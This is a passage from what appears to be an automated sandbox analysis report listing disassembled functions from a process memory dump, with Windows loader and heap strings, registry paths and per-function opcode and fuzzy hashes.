                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                              • API String ID: 0-1334570610
                                                                              • Opcode ID: 44147ca5563ebd76c120552d636d8a613f08ba5623473f57d27964ec0595ac6d
                                                                              • Instruction ID: e2e80ba0867003d9a3af703f4812f989f7b952425e9f15f0da59700d005ab3d6
                                                                              • Opcode Fuzzy Hash: 44147ca5563ebd76c120552d636d8a613f08ba5623473f57d27964ec0595ac6d
                                                                              • Instruction Fuzzy Hash: F361AB716003059FDB29CF28C884BABFBB1FF45704F15859AE449CB292D770E981CB91
                                                                              Function 017DC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 018182E8
                                                                              • Failed to reallocate the system dirs string !, xrefs: 018182D7
                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 018182DE
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-1783798831
                                                                              • Opcode ID: 1d06bde46c67385c82113ba81b62511d5641631d378d91c46d3b74bf5c724d61
                                                                              • Instruction ID: b87413ee3b8bd93655c1830a29b9edae4c492469d0ea60f01504acc292a04135
                                                                              • Opcode Fuzzy Hash: 1d06bde46c67385c82113ba81b62511d5641631d378d91c46d3b74bf5c724d61
                                                                              • Instruction Fuzzy Hash: C94125B2541305ABC722EB68DC89B5BB7F8AF48720F19092EF955C3258E770D900CBD1
                                                                              Function 0185C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0185C1C5
                                                                              • @, xrefs: 0185C1F1
                                                                              • PreferredUILanguages, xrefs: 0185C212
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                              • API String ID: 0-2968386058
                                                                              • Opcode ID: db87d6dc4b53afac7f0f10706b11c36a9011abb110334b19768aaaa78fc24431
                                                                              • Instruction ID: fdef3bdb83965e3a5db392fe3fdfcf626b9385d07723b3fe6b77b9f90721a755
                                                                              • Opcode Fuzzy Hash: db87d6dc4b53afac7f0f10706b11c36a9011abb110334b19768aaaa78fc24431
                                                                              • Instruction Fuzzy Hash: 3D414F75A00209ABDF51DAD8C895BEEFBBCEB14744F14406AEA09F7284D7749A448F90
                                                                              Function 01834144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                              • API String ID: 0-1373925480
                                                                              • Opcode ID: f8439bf11a5c253ec0a045d0612daf6b6c660ee3593e2f4b51cb0ce2d2d11fa4
                                                                              • Instruction ID: 6b6053061c039eec3f4e128d070b8199b29d6c8a53a199562ea4480c5d809fb3
                                                                              • Opcode Fuzzy Hash: f8439bf11a5c253ec0a045d0612daf6b6c660ee3593e2f4b51cb0ce2d2d11fa4
                                                                              • Instruction Fuzzy Hash: 3F412631A00A58CBEB26DFD8C844BADBBB8FF95344F180459D901FB791D7748A41CB90
                                                                              Function 01824755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01824899
                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01824888
                                                                              • LdrpCheckRedirection, xrefs: 0182488F
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                              • API String ID: 0-3154609507
                                                                              • Opcode ID: 7b0d25a13636c6a366fb5e92bba212097d218741eab4ed04ccaf9d47da370144
                                                                              • Instruction ID: 41d53f930765fbe951db4198f86b73259493aed621d9725720733f8b19d922f6
                                                                              • Opcode Fuzzy Hash: 7b0d25a13636c6a366fb5e92bba212097d218741eab4ed04ccaf9d47da370144
                                                                              • Instruction Fuzzy Hash: C441D072A102759FCB23CE6CD840A26BBE4BF49B50F060269ED58D7311D770DA80CBA1
                                                                              Function 017B0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                              • API String ID: 0-2558761708
                                                                              • Opcode ID: 97fdcd5c099f568493abfc82be72c135dfc62a2a8753803b533ebe45edf54e5a
                                                                              • Instruction ID: 3c763fe673eaabd453c88562c3eda205688897da9d3ffc08dcdd715f5078d7bd
                                                                              • Opcode Fuzzy Hash: 97fdcd5c099f568493abfc82be72c135dfc62a2a8753803b533ebe45edf54e5a
                                                                              • Instruction Fuzzy Hash: C711DE7131450ACFDB6ACB18D8D4BABF3A4AF40B15F198159F006CB291DB30D940CB61
                                                                              Function 018220DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01822104
                                                                              • Process initialization failed with status 0x%08lx, xrefs: 018220F3
                                                                              • LdrpInitializationFailure, xrefs: 018220FA
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-2986994758
                                                                              • Opcode ID: 3e8caad0a20bef838692cd77537274fe8f954214c7c8820bcd4b9a92cede8d01
                                                                              • Instruction ID: aa50c96267b2bac563a35ee17b113a3db54e1352fa5120a166370d33eba1a873
                                                                              • Opcode Fuzzy Hash: 3e8caad0a20bef838692cd77537274fe8f954214c7c8820bcd4b9a92cede8d01
                                                                              • Instruction Fuzzy Hash: 60F0F675680718BBEB25EB4CCC56F9977ADFB40B54F240069FA00F7285D6B0AB40CA91
                                                                              Function 017B03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: #%u
                                                                              • API String ID: 48624451-232158463
                                                                              • Opcode ID: af856dd45e3858842d580cb129d1ec4d79de784fbcb72a2c67a249d12ecbc852
                                                                              • Instruction ID: 8bdd5adc75cc3361716b9acef270047f066b38caef303b9d393b109b3891506f
                                                                              • Opcode Fuzzy Hash: af856dd45e3858842d580cb129d1ec4d79de784fbcb72a2c67a249d12ecbc852
                                                                              • Instruction Fuzzy Hash: B5712C71A0014A9FDB12DFA8C994FAEB7F8BF18704F144065EA05E7255EB38EE41CB61
                                                                              Function 017AA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • LdrResSearchResource Exit, xrefs: 017AAA25
                                                                              • LdrResSearchResource Enter, xrefs: 017AAA13
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                              • API String ID: 0-4066393604
                                                                              • Opcode ID: e561ea46d94a95167e68c2cabc55a0b1a96a2a87c9e5414e44ba4be6cad99673
                                                                              • Instruction ID: 8e0c5c59ec8719c7be617b8fc3eaa9466676a8af4b95157da276ee48e9baad7a
                                                                              • Opcode Fuzzy Hash: e561ea46d94a95167e68c2cabc55a0b1a96a2a87c9e5414e44ba4be6cad99673
                                                                              • Instruction Fuzzy Hash: 12E19471E00219DFEB22CF99CD94BAEFBBABF98350F500569E901E7291D7749A40CB50
                                                                              Function 0186A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: `$`
                                                                              • API String ID: 0-197956300
                                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                              • Instruction ID: 938ade231ab903273e5c5ada9832a35f0349b64c84c53a83b7445840692d7f5c
                                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                              • Instruction Fuzzy Hash: DAC1F4312043469BE729CF28C845B6BBBE9BFC4318F084A2CF696DB291D775DA05CB51
                                                                              Function 0181E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: Legacy$UEFI
                                                                              • API String ID: 2994545307-634100481
                                                                              • Opcode ID: 81831ca1a5822f4b9ab8b349a174a10d0213d700c9ab883cd56713c01c84fb4b
                                                                              • Instruction ID: cd5b13cd146aec8802ab59db9cd1e2b5a905611da4bc6a218c1f4915006d26fb
                                                                              • Opcode Fuzzy Hash: 81831ca1a5822f4b9ab8b349a174a10d0213d700c9ab883cd56713c01c84fb4b
                                                                              • Instruction Fuzzy Hash: 00616072E003099FEB15DFA8C844BAEBBF9FB48704F14446DEA59EB255D731AA40CB50
                                                                              Function 018443D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$MUI
                                                                              • API String ID: 0-17815947
                                                                              • Opcode ID: 31972d8d4cfc29f41193b0065d3c17de1916a6694a44d75512a94ba90a0db813
                                                                              • Instruction ID: fc34e15d1f17c03acce5b161a2afc7cf080d5e6bf77ebceb4df8b4ca8af2d50e
                                                                              • Opcode Fuzzy Hash: 31972d8d4cfc29f41193b0065d3c17de1916a6694a44d75512a94ba90a0db813
                                                                              • Instruction Fuzzy Hash: 3D512871E0021DAFDF11DFA9CC84BEEBBBDAB48754F100529E615F7291DA709A05CBA0
                                                                              Function 017A04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 017A063D
                                                                              • kLsE, xrefs: 017A0540
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                              • API String ID: 0-2547482624
                                                                              • Opcode ID: 917546f4b31fc088232d7f305954283a8be56573576591b95c124f2b2df73c8e
                                                                              • Instruction ID: e6cd202b16fc595f3a1bb8aed7baaa13bddfd9b978bb5464d4a3c53912e9dc2f
                                                                              • Opcode Fuzzy Hash: 917546f4b31fc088232d7f305954283a8be56573576591b95c124f2b2df73c8e
                                                                              • Instruction Fuzzy Hash: CC519A715047428FD724EF68C444AA7FBE4AFC4308F644E3EEAEA87241E770A545CB92
                                                                              Function 017AA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 017AA2FB
                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 017AA309
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                              • API String ID: 0-2876891731
                                                                              • Opcode ID: b3c7ac52690a14b1b29e8c8109a116cac445f9a6f141aef4d83108eaa7bdfbb5
                                                                              • Instruction ID: 0202c504af76c636a9454b9fda2ce6feb1891ddf0dba23fbd0ba0baf248917d2
                                                                              • Opcode Fuzzy Hash: b3c7ac52690a14b1b29e8c8109a116cac445f9a6f141aef4d83108eaa7bdfbb5
                                                                              • Instruction Fuzzy Hash: 7C41E130A04659DBEB12CF6DC894B6EBBB5FF85300F1441A5E900DB291E7B5DA40CB41
                                                                              Function 017DA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: Cleanup Group$Threadpool!
                                                                              • API String ID: 2994545307-4008356553
                                                                              • Opcode ID: 71f7f20df48773cad8d19ec64af6a0565ecf4faa2b837760805c69c989191f11
                                                                              • Instruction ID: 8449aaa76f2dc418e5a0ff2cb4cf5c349369a78130bda45f353e80901d28f71e
                                                                              • Opcode Fuzzy Hash: 71f7f20df48773cad8d19ec64af6a0565ecf4faa2b837760805c69c989191f11
                                                                              • Instruction Fuzzy Hash: DD01D1B2244708EFE311DF14CD49B26B7F8FB84715F058979A648C7190E374D904CB46
                                                                              Function 017AC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: MUI
                                                                              • API String ID: 0-1339004836
                                                                              • Opcode ID: f739975bf6fac3474c5434adec5c5d54aef60fe0cc127983d1e6d5788b303409
                                                                              • Instruction ID: 94453ae562ebc6daa369c65ab1f43bdfcf6fc7832dea6bc3d6af40b7d38bd2e1
                                                                              • Opcode Fuzzy Hash: f739975bf6fac3474c5434adec5c5d54aef60fe0cc127983d1e6d5788b303409
                                                                              • Instruction Fuzzy Hash: 19827B75E002189FEB25CFA9C884BEDFBB5BF88310F548269E919AB751D7309981CF50
                                                                              Function 0184A118 Relevance: 1.8, Strings: 1, Instructions: 591COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @
                                                                              • API String ID: 0-2766056989
                                                                              • Opcode ID: a3b574da113ea673e2b9ac4f3c61f63d8a0385dc1a01fb2fc3d74677dc44e079
                                                                              • Instruction ID: 0daf9a6aebe6519eed4b9684641d584cd4ac8d73426f51147c1a9e4e02c0daa9
                                                                              • Opcode Fuzzy Hash: a3b574da113ea673e2b9ac4f3c61f63d8a0385dc1a01fb2fc3d74677dc44e079
                                                                              • Instruction Fuzzy Hash: 7222C2742446698BEB2DCF2DC094376BBF1AF44304F08845AE997CF286EB35D652DB60
                                                                              Function 01826420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID: 0-3916222277
                                                                              • Opcode ID: 81d26b840519447bc9ffe8f7167022ad28e478fd7306f1eecf1e1b4874a7a4f1
                                                                              • Instruction ID: 144ea78823a1c5e9a9e1a31fabaa4d8a1a1489511fe93c58af4001965c673129
                                                                              • Opcode Fuzzy Hash: 81d26b840519447bc9ffe8f7167022ad28e478fd7306f1eecf1e1b4874a7a4f1
                                                                              • Instruction Fuzzy Hash: CE916771900229AFEB22DF95CD85FAEBBB8EF18B50F204059F600EB195E774AD40CB50
                                                                              Function 0184E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID: 0-3916222277
                                                                              • Opcode ID: 0b929f01adab17296cd7bdcf410082f34b5833e8697b454c69378c3a2ea4027d
                                                                              • Instruction ID: c5a932a9f97a0a17d4ed3a073443a91b40165407f69d3d7cc67cba4e84f9e376
                                                                              • Opcode Fuzzy Hash: 0b929f01adab17296cd7bdcf410082f34b5833e8697b454c69378c3a2ea4027d
                                                                              • Instruction Fuzzy Hash: 79918F3190061DABDB22ABA5DC88FAFBBB9FF45744F100029F501E7251EB389A01CB51
                                                                              Function 017DA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: GlobalTags
                                                                              • API String ID: 0-1106856819
                                                                              • Opcode ID: f1910f47f154bd87cba8b63fa5de998ef2aef155c3ca05609311511262567f51
                                                                              • Instruction ID: ae04b588e86351c7b0ac8a90374a4e18ff1a0bc04df4dcf791531cf0e3712640
                                                                              • Opcode Fuzzy Hash: f1910f47f154bd87cba8b63fa5de998ef2aef155c3ca05609311511262567f51
                                                                              • Instruction Fuzzy Hash: 08716FB6E0020ACFDF28CF9CD5906ADBBB5BF48710F24852EE945E7248E7719A41CB50
                                                                              Function 01844978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .mui
                                                                              • API String ID: 0-1199573805
                                                                              • Opcode ID: 1294a8726cc965250e60ce7a57126f3cc2357d4d84c1545757750547eebad329
                                                                              • Instruction ID: 7925e3e0f553ff873d11362ca8a676235e334398f0ada4693333bf3eab9ca0e5
                                                                              • Opcode Fuzzy Hash: 1294a8726cc965250e60ce7a57126f3cc2357d4d84c1545757750547eebad329
                                                                              • Instruction Fuzzy Hash: 12519172D0022E9BDF10DF99D844BAEFBB4AF08B54F054129EA11FB255DB349A01CBE4
                                                                              Function 017BE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: EXT-
                                                                              • API String ID: 0-1948896318
                                                                              • Opcode ID: f96e274e0c2db5fa8d4a73b28c00b78a0625741b44f215e4aede2ac438ee8338
                                                                              • Instruction ID: b7d58deb7cc90963252eb6ac6c1b5ebeac5f0ec5234f305d9de43ae0b65d65ab
                                                                              • Opcode Fuzzy Hash: f96e274e0c2db5fa8d4a73b28c00b78a0625741b44f215e4aede2ac438ee8338
                                                                              • Instruction Fuzzy Hash: BA417072508342ABD711DA75D884BEBFBE8AF88B14F440A2DF684D7280EB74D944C796
                                                                              Function 0181C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: BinaryHash
                                                                              • API String ID: 0-2202222882
                                                                              • Opcode ID: 1852f749d57c12c97ce5c7937f1d938253d36f2a485c16cfaf7453a2dae6fc60
                                                                              • Instruction ID: eae4daf10ff13b91d351460383e18c523a88414715315124ce99cff58efdc6f9
                                                                              • Opcode Fuzzy Hash: 1852f749d57c12c97ce5c7937f1d938253d36f2a485c16cfaf7453a2dae6fc60
                                                                              • Instruction Fuzzy Hash: F44142B2D4022DAADB21DB54CC84FDEB7BCAB44714F0045A5EB08EB145DB709F898FA5
                                                                              Function 01836B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: #
                                                                              • API String ID: 0-1885708031
                                                                              • Opcode ID: b1ccae5a7d0118eb2629616f66d53a7e533abd35c6c752e50e8d69d92d810889
                                                                              • Instruction ID: 5946c84e1bcd33f50f9f724baf521927bf96112e6e9fc953a125430dd273c517
                                                                              • Opcode Fuzzy Hash: b1ccae5a7d0118eb2629616f66d53a7e533abd35c6c752e50e8d69d92d810889
                                                                              • Instruction Fuzzy Hash: 1231FE31A00719ABDB22DB6DC854BEEBBF4DF55704F284068E941DB282E775DB06CB90
                                                                              Function 0181CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: BinaryName
                                                                              • API String ID: 0-215506332
                                                                              • Opcode ID: 189d89652c053799908e23fbaedb16815519850bbf2274577cd28c8e80dc67fd
                                                                              • Instruction ID: 0cc54062ad31c98313f2364a27aba55ad2e9678629277c1811cd748a43e42e51
                                                                              • Opcode Fuzzy Hash: 189d89652c053799908e23fbaedb16815519850bbf2274577cd28c8e80dc67fd
                                                                              • Instruction Fuzzy Hash: E931D177A40519AFEB16DB59C845E6FBBB8FB80720F014129E905E7255D730AE04DBE0
                                                                              Function 0182892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0182895E
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                              • API String ID: 0-702105204
                                                                              • Opcode ID: cce563a9828d99f5a1ff5994a13d86421c6d9ef608b625bcf8ea9eb2654c1aa4
                                                                              • Instruction ID: 97b68c095d8a05cd39094598003da0ca45033e152ecb5eb98e440abcc7a504d6
                                                                              • Opcode Fuzzy Hash: cce563a9828d99f5a1ff5994a13d86421c6d9ef608b625bcf8ea9eb2654c1aa4
                                                                              • Instruction Fuzzy Hash: E001F7323002319BEF276F9AD8C4B6A7BA5EF82754F08011DF64186555CB207AC0C792
                                                                              Function 01842000 Relevance: .8, Instructions: 757COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 01d7c7970ca9b9d943d886e9abc22cc0e410cae5b587e6cfebe29497b78fcc41
                                                                              • Instruction ID: cd0c04fab7fc9366772328b9c24abe4154d83e1162bbd54109144cbc8d9144c3
                                                                              • Opcode Fuzzy Hash: 01d7c7970ca9b9d943d886e9abc22cc0e410cae5b587e6cfebe29497b78fcc41
                                                                              • Instruction Fuzzy Hash: FC42C53560C3498BE725CF68D890A6FFBE6AF88704F04092DFA82D7250DB71DA45CB52
                                                                              Function 01838158 Relevance: .6, Instructions: 617COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a3f111f3db09c3a4e020788ca75fab8c7f9a6d5bc207d789e5efc7f3031d27be
                                                                              • Instruction ID: 1c5031d33e243d2523a3bda428cec4d85bc798be092cc7b8514bd3158e8524a0
                                                                              • Opcode Fuzzy Hash: a3f111f3db09c3a4e020788ca75fab8c7f9a6d5bc207d789e5efc7f3031d27be
